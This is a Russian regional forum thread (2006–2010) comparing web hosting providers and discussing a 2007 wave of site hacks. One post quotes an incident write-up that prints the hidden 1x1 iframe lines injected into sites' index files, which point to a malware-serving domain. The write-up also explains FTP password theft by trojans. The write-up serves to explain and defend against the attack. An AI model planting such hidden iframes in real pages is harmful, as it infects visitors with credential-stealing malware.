«Камчатский форум» logo

Здравствуйте, гость ( Вход | Регистрация )

2 страниц   1 2 >   ( К первому непрочитанному сообщению )
Ответить · Открыть тему
> Хостинг, Мнения - впечатления...
philyuchkoff
05.09.2006, 10:35
Сообщение #1


Ветеран
******

Награды: 4
Группа: VIP
Сообщений: 1 024
Регистрация: 14.03.2005

Репутация: 17 [ - / + ]


Кто-нибудь пользовался услугами хостера rusonyx.ru?
Если да - какие впечатления?
Очень заманчиво они рассказывают про свои возможности (суди по описанию - неограниченные smile.gif), цены небольшие...


--------------------
Suum cuique
Офлайн · Карточка · Приват
^
artyom_b
05.09.2006, 11:12
Сообщение #2



*******

Награды: 11
Группа: ?????????
Сообщений: 8 327
Регистрация: 21.04.2004

Репутация: 1 [ - / + ]


Пользоваться не приходилось.

Исторически пользуемся свеб, размещал один раз сайт
на арбатеке, понравилось.... Не впечатлили агава и неймсервер.

Можно попробовать поискать здесь:
http://www.hostinfo.ru/ + http://www.hostobzor.ru


--------------------
Офлайн · Карточка · Приват
^
philyuchkoff
05.09.2006, 13:08
Сообщение #3


Ветеран
******

Награды: 4
Группа: VIP
Сообщений: 1 024
Регистрация: 14.03.2005

Репутация: 17 [ - / + ]


Я не ищу smile.gif
Лучше .m ничего в своей жизни не встречал smile.gif
Единственный минус у них (для меня) - всего две мускульных базы, и дополнительный ftp доступ за деньги.


--------------------
Suum cuique
Офлайн · Карточка · Приват
^
Rownt
05.09.2006, 13:27
Сообщение #4


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Мне тоже нарвится свеб... Лучшего по удобству работы, оплаты, техподдержки ничего не видел. Дешевле есть, а удобней....


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^
Kevin
05.09.2006, 14:12
Сообщение #5


*******
*******

Награды: 9
Группа: ????. ??????
Сообщений: 3 738
Регистрация: 02.04.2004

Репутация: 42 [ - / + ]


А что с хостингом, у которого есть PHP 5,
кто пользовался такими? Какие на примете
есть?
Офлайн · Карточка · Приват
^
Rownt
06.09.2006, 7:41
Сообщение #6


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Цитата(Kevin @ 05.09.2006, 15:12)

А что с хостингом, у которого есть PHP 5,
кто пользовался такими? Какие на примете
есть?

На свебе есть давно... Да наверное уже у многих появился.


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^
nitro80
06.09.2006, 12:31
Сообщение #7


Элита
*******

Награды: 4
Группа: ?????????
Сообщений: 1 682
Регистрация: 26.05.2005

Репутация: 5 [ - / + ]


Цитата(philyuchkoff @ 05.09.2006, 11:35)

Кто-нибудь пользовался услугами хостера rusonyx.ru?
Если да - какие впечатления?
Очень заманчиво они рассказывают про свои возможности (суди по описанию - неограниченные smile.gif), цены небольшие...

Хм... не слышал...
Одно могу сказать, mtw.ru - гавённый хостинг, постоянно какие-то недоделки встречаются...
Нравится majordomo.ru...


--------------------
Офлайн · Карточка · Приват
^
Ilya V. Rudomilov
07.09.2006, 12:07
Сообщение #8


Путяра, пшёл вон!
*******

Награды: 9
Группа: ??????
Сообщений: 14 825
Регистрация: 30.03.2004

Репутация: 36 [ - / + ]


Цитата
А что с хостингом, у которого есть PHP 5,
кто пользовался такими? Какие на примете
есть?

На свебе включается легко. Вот wiki.mykam.ru на PHP5 написан.


--------------------
Обязательно к изучению - мой блог о моей жизни в Чехии! И хватит спрашивать "Почему же Чехия?.." - все ответы описаны уже.
Офлайн · Карточка · Приват
^
Rownt
17.03.2007, 21:37
Сообщение #9


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Свеб прокололся с защитой. Неделю назад на часть серверов была проведена атака. Были вскрыты индексные файлы корневых папок клиентских доменов и дописан код инфрейма, ведущий к загрузке вирусенка.

Справедливости ради, следует отметить, что на моей памяти это первый прокол такого рода. Удивительно, команда на свебе считается весьма профессиональной...


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^
Ilya V. Rudomilov
17.03.2007, 23:37
Сообщение #10


Путяра, пшёл вон!
*******

Награды: 9
Группа: ??????
Сообщений: 14 825
Регистрация: 30.03.2004

Репутация: 36 [ - / + ]


Цитата
Справедливости ради, следует отметить, что на моей памяти это первый прокол такого рода. Удивительно, команда на свебе считается весьма профессиональной...

Ничего не бывает идеального. Тот же masterhost время от времени ошибается. В целом свеб - 5-. Лучшего соотношения цены/качество еще не видел.


--------------------
Обязательно к изучению - мой блог о моей жизни в Чехии! И хватит спрашивать "Почему же Чехия?.." - все ответы описаны уже.
Офлайн · Карточка · Приват
^
Rownt
19.03.2007, 7:48
Сообщение #11


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Цитата(Ilya V. Rudomilov @ 18.03.2007, 0:37)

Ничего не бывает идеального.

Точно. Сегодня пошла вторая волна. Снова один сайт взломан и завирусован через инфрэйм. Пока не разбирался, но похоже пора предьявлять свебу серьезные претензии.


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^
artyom_b
19.03.2007, 8:06
Сообщение #12



*******

Награды: 11
Группа: ?????????
Сообщений: 8 327
Регистрация: 21.04.2004

Репутация: 1 [ - / + ]


Немного изучив данный вопрос, пришел к выводу,
что дело может быть не только (а может быть и не столько)
в хостере. Причина может быть в краже фтп-паролей
с клиентской машины, а затем...

Я думаю, как минимум, стоит заменить пароль,
и не хранить его в настройках подключения в фтп-клиенте...
+ проверить ПК на вирусы...

Сообщение отредактировал artyom_b - 19.03.2007, 8:13


--------------------
Офлайн · Карточка · Приват
^
Rownt
19.03.2007, 9:23
Сообщение #13


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Цитата(artyom_b @ 19.03.2007, 9:06)

Причина может быть в краже фтп-паролей
с клиентской машины, а затем...

Возможно.
Мне кажется не склиентской.... а c базы сервера...


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^
Rownt
23.03.2007, 18:26
Сообщение #14


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Что-то мне перестало все это нравиться...
Свеб с понедельника не подтверждает зачисление платежа на аккаунт, а сегодня вообще не пускает в панель управления по 500 ошибке.

Только один аккаунт открылся... Полоса, что ли?


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^
Ilya V. Rudomilov
31.03.2007, 3:20
Сообщение #15


Путяра, пшёл вон!
*******

Награды: 9
Группа: ??????
Сообщений: 14 825
Регистрация: 30.03.2004

Репутация: 36 [ - / + ]


Цитата
Точно. Сегодня пошла вторая волна. Снова один сайт взломан и завирусован через инфрэйм. Пока не разбирался, но похоже пора предьявлять свебу серьезные претензии.

Винить надо не свеб, а себя - трояны воруют пароли. Это целая волна в Рунете:
Цитата(http://vitafil.habrahabr.ru/blog/8158.html#comment78280)
Из официального заявления представителей ЗАО «Мастерхост»
«Специалистами службы технической безопасности компании .masterhost за последние дни было зафиксировано резкое увеличение случаев хищения реквизитов FTP-доступа с компьютеров пользователей. Велика вероятность того, что это целенаправленные волновые атаки троянских программ или вирусов, которые осуществляют различные несанкционированные вами действия. Наши специалисты совместно с компаниями-партнерами, специализирующимися на решениях по информационной безопасности, активно изучают зловредный трафик с целью локализации очага вредоносных атак...»

Что произошло?
В одно прекрасное утро на главных и прочих страницах нескольких сайтов появились голые бабы. На уровне HTML-кода это выглядело следующим образом:


ифрейм src='http://lem0n.info/km/ya.php' width=1 height=1 ифрейм

ифрейм src='http://lem0n.info/km/love.htm' width=1 height=1 ифрейм

Такие строчки были вставлены в index.php, index.htm, index.html
При загрузке странички у посетителя пытался грузиться вирус (благо, нортон антивирус его не пропускал) и, помимо нормального контента сайта, загружались всевозможные голые женщины.
Сложность была в том, что имела место правка файлов на фтп. Подозревали, что взломана система администрирования, однако все оказалось совсем не так. Был взломан проект, свёрстанный в HTML, никакого PHP там в помине не было. К тому же, CHMOD везде стоял 644, а значит, править файлы мог либо владелец, либо root.

Кто это сделал?
Разумеется, мы запросили логи мастерхоста по заходам на площадки по фтп в ту "вальпургиеву ночь". Был обнаружен привязанный к домену SPORT.MCHOST.RU IP адрес, с которого заходили на фтп – 84.252.148.70. Это дало понять, что root тут ни при чём. При заходе на http://mchost.ru/ был обнаружен некий невнятный хостинг, имеющий в «контактах» только email и номер ICQ а в «способах оплаты» – яндекс-деньги. Другими словами, местоположение данного хостинга даже со спутника вряд ли пеленгуется. Вполне очевидно, что этот сервер просто был взломан и использовался как площадка для атаки. Владелец хостинга, конечно же, этого никогда не признает, а значит, и логов никаких не даст. Что, увы, оставляет злоумышленника вне зоны досягаемости.

Как взломали сайты?
Логи .masterhost подтверждают наличие захода по фтп на площадку, а значит, кто-то знал пароли. Маловероятно, что пароль подобрали. Более правдоподобной нам показалась версия, предполагающая наличие ищущих на локальном компьютере и отсылающих куда-либо пароли вирусов. Адекватные меры предосторожности против подобных атак всем известны. Дело казалось раскрытым, но... Было взломано много сайтов. Человека, который бы одновременно знал все эти пароли, не существовало. Google подсказал, что во Вселенной мы не одиноки: по сети прошла целая волна таких взломов.

Выводы
Массовость подобных взломов заставляет предположить, что дело не только в вирусах, которые рассылают пароли, но и в хостерах. Трудно поверить, что все пострадавшие попались на вирус. Как можно взломать хостера и узнать пароли на фтп? Вряд ли это был взлом FreeBSD – тому есть много причин. Следует согласиться с теми, кто полагает, что это был взлом контрольной панели.
1. У контрольной панели есть доступ к паролям на фтп (т к. с ее помощью их можно менять), стало быть, определенный запрос позволяет получить, как минимум, список хешей паролей (возможно, и сами пароли).
2. Взлому подверглись многие хостеры. Следовательно, они все имеют одну и ту же уязвимость в контрольной панели. Конечно, ни мастерхост, ни другие хостеры никогда не признают этого прямо. Однако некоторые их высказывания на тему взломов подтверждают версию взлома контрольной панели.
Пример: Valuehost
Что сделано нового сейчас:
+ используется новый алгоритм хранения паролей FTP для защиты от взломов;
+ введена функция в панели управления по установке количества дней устаревания нового пароля;
+ введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт.
новый алгоритм хранения паролей, функция устаревания паролей – нововведения помогающие защититься от кражи паролей с помощью перебора. Значит, до этого кто-то все-таки имел возможность перебирать пароли.
введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт – убийственный пункт.Хостеры, несмотря на принятые меры, не могут гарантировать полную защиту пароля на фтп и предлагают мне в целях безопасности вообще отключить фтп-доступ.
Мастерхост более осторожен в высказываниях, но факты взлома подтверждают то, что и у него наблюдаются подобные проблемы. Конечно же, нужно понимать, что изначально проблема кроется в софте, установленном в качестве контрольной панели, но позиция хостера все равно ошибочна. Он не озаботился разработкой собственной контрольной панели, а если и озаботился, то плохо защитил её.
Итоги размышлений над данным вопросом весьма плачевны: если уж агава и мастерхост подверглись взлому, что говорить о других хостерах. Остаётся надеяться и верить в то, что хостеры займутся разработкой своих контрольных панелей и сделают соответствующую защиту, а люди, в свою очередь, будут более тщательно охранять свои пароли и защищаться от вирусов. Надежда, как известно, умирает последней...

Необходимое дополнение
Вирус, что пытался грузится со взломанных сайтов, действительно находит и рассылает пароли с вашего компьютера. У нас так были взломаны 2 фтп-акаунта на наш рабочий сервер, на котором в принципе отсутствует контрольная панель, и в логах доступа нет попытки перебора паролей на фтп. Так что свои компы тоже нужно защищать и более серьезно относиться к хранению паролей.

Из официального заявления представителей ЗАО «Мастерхост»
«Для снижения риска инфицирования вашего компьютера также советуем вам своевременно осуществлять обновление антивирусного ПО, в том числе антивирусных баз.В случае подозрений, что целостность ваших данных была нарушена и какие-либо данные могли быть использованы посторонними лицами, оперативно измените пароль FTP-доступа к вашим ресурсам и обязательно проверьте ваш персональный компьютер свежим антивирусным ПО».

Технический директор компании "Творческие Люди"
А. Лебедев


--------------------
Обязательно к изучению - мой блог о моей жизни в Чехии! И хватит спрашивать "Почему же Чехия?.." - все ответы описаны уже.
Офлайн · Карточка · Приват
^
Rownt
31.03.2007, 10:54
Сообщение #16


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Цитата(Ilya V. Rudomilov @ 31.03.2007, 4:20)

Винить надо не свеб, а себя - трояны воруют пароли. Это целая волна в Рунете:

Илья, а зачем ты тогда отквотил сообщение, которое это высказывание опровергает? Ты его, что до конца не дочитал?...smile.gif


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^
L@mer
31.03.2007, 21:43
Сообщение #17


Ветеран
******

Награды: 3
Группа: ??????
Сообщений: 1 368
Регистрация: 25.11.2005

Репутация: 20 [ - / + ]


Трудно давать оценки, там, где нет полной информации, но ИМХО такой массовый взлом возможен лишь при наличии огромной дырищи у хостера. Очень интересно посмотреть какие ISP панели были у ломаных хостеров. Хотя если честно информации очень мало, видать "рыло в пуху" на разных уровнях, но как бы там нибыло виноват в 90% массовых взломов - хостер.

Сообщение отредактировал LСобакаmer - 31.03.2007, 21:43


--------------------
Я бы изменил мир, но бог не дал исходников...
Изображение
Офлайн · Карточка · Приват
^
Ilya V. Rudomilov
02.04.2007, 1:13
Сообщение #18


Путяра, пшёл вон!
*******

Награды: 9
Группа: ??????
Сообщений: 14 825
Регистрация: 30.03.2004

Репутация: 36 [ - / + ]


Цитата
какие ISP панели были у ломаных хостеров

Точно разные. smile.gif Абсолютно разные, от разных производителей.
Цитата
Илья, а зачем ты тогда отквотил сообщение, которое это высказывание опровергает? Ты его, что до конца не дочитал?...

Но все же указано даже в дополнении о вирусе. Я не пострадал, да и вообще стараюсь не хранить паролей в программах. А любой keylogger легко обнаруживается тем же KIS'ом, т.к. это примитивно.

Не нужно все списывать на хостера. В подобных массовых атаках я вижу проблему в безопасности клиентов. Сейчас больше атакуют не серверы, а клиентов, т.к. последние о своей безопасности вообще не думают - у многих даже бесплатного антивируса не стоит.
Цитата
лишь при наличии огромной дырищи у хостера

Значит оказалось, что в распространенном FTP-сервере на многих хостингах есть эта дыра.


--------------------
Обязательно к изучению - мой блог о моей жизни в Чехии! И хватит спрашивать "Почему же Чехия?.." - все ответы описаны уже.
Офлайн · Карточка · Приват
^
L@mer
02.04.2007, 11:01
Сообщение #19


Ветеран
******

Награды: 3
Группа: ??????
Сообщений: 1 368
Регистрация: 25.11.2005

Репутация: 20 [ - / + ]


Цитата(Ilya V. Rudomilov @ 02.04.2007, 2:13)

Точно разные. smile.gif Абсолютно разные, от разных производителей.

Разные, это очень относительное понятие. Могут быть разные по названию, но "движка" и алгоритмический базис один. Так что интересна подобная статистика.

Цитата(Ilya V. Rudomilov @ 02.04.2007, 2:13)

Значит оказалось, что в распространенном FTP-сервере на многих хостингах есть эта дыра.

Не исключаю дыры и в самом ПО, но чаще это проблемы админов, а еще чаще - проблема компромисса между удобством и безопасностью. Хотя, интересна и такая статистика, какие ftp и какой версии использовали хостеры?


--------------------
Я бы изменил мир, но бог не дал исходников...
Изображение
Офлайн · Карточка · Приват
^
Rownt
18.10.2010, 20:36
Сообщение #20


Учитель созерцания
*******

Награды: 7
Группа: ??????
Сообщений: 3 261
Регистрация: 04.04.2004

Репутация: 25 [ - / + ]


Мне больше не за что восхищаться хостером SWEB.RU
Он потихоньку превратился в монстра. Неужели это заложенный свыше алгоритм развития любой коммерчески успешной компании?

... а ведь было время.... blush.gif
Когда то SWEB обладал "человеческим" лицом. Он из кожи лез что бы понравиться клиенту, предлагал привлекательные феньки одну за другой. Его служебные роботы создавали иллюзию общения с живым человеческим разумом, а теперь переписка с персоналом тех-поддержки, наоборот, напоминает диалог с не самым совершенным роботом.

Не пытайтесь меня спрашивать: "А в чем, собственно, состоят претензии"? Нету претензий... С формальной стороны - нету. А с человеческой, такое ощущение, которое возникает когда игривый, симпатичный, замечательный щенок вдруг вырастает огромного слюнявого неухоженного пса, который постоянно норовит нагадить в прихожей (если ты слегка опоздал с прогулкой) или залесть своей грязной мордой в твою тарелку с борщом на обеденном столе.

Все течет, все измняется... Времена тоже. Наступает момент, когда лучше всего озаботиться подбором нового хостера. Для меня такое время видимо уже настало.


--------------------
... сами не летаем и другим не дадим...:)

Камчатская студия дизайна Art Fashion Line
Офлайн · Карточка · Приват
^

2 страниц   1 2 >
Ответить · Открыть тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



Код кнопки 88x31 Текстовая версия Русская версия Invision Power Board v2.1.7 © 2006  IPS, Inc.